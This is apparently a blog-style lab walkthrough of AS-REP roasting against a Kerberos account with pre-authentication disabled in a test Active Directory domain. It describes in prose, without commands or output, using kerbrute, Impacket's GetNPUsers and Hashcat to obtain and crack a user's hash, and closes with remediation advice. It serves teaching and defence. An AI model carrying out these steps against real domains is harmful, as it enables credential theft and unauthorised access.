AS-REP Roasting When Pre-Auth Is Disabled.

AS-REP roasting is a attack on Kerberos that allows for retrieving password hashes from users without the pre-authentication step. The pre-authentication step is the initial step in the Kerberos authentication, where a user sends an encrypted request to the KDC to authenticate to a service. If the option is disabled, the user will not send an encrypted request to the KDC to request authentication. Instead, It will send a plain text request and receive the messages AS-REP encrypted from the Authentication Server without the first verification step. Since one of the messages in the response is encrypted with the user’s hash, an attacker can obtain the hash. If the password is weak it the hash can be easily cracked.

PoC Video

Lab Setup

Active Directory lab contains one machine:

• ADDC.factory.local - Domain Contoller

Note: The build scripts are under Resources at the bottem of this page if you wish to recreate this lab.

Walkthrough

Enumerating users with kerbrute allows you to know which user accounts are on the target domain and which accounts could potentially be used to access the network. We discover a user account ‘reed’

Kerberos pre-authentication shows disabled for account ‘reed’. Lets use Impackets GetNPUsers to grab the krbasrep5 hash and see if it can be cracked using the standard rockyou wordlist.

Using Hashcat to crack the hash proves successful. Revealing the users password in plain text.

Resources

If you would like to setup and complete this lab the OVA file can be obtained from my Dropbox share HERE.

Remediation

Audit AD user accounts and set pre-authentication for all accounts where not enabled. Implement stronger password policies and consider using two factor authentication.

author: Jeff Griggs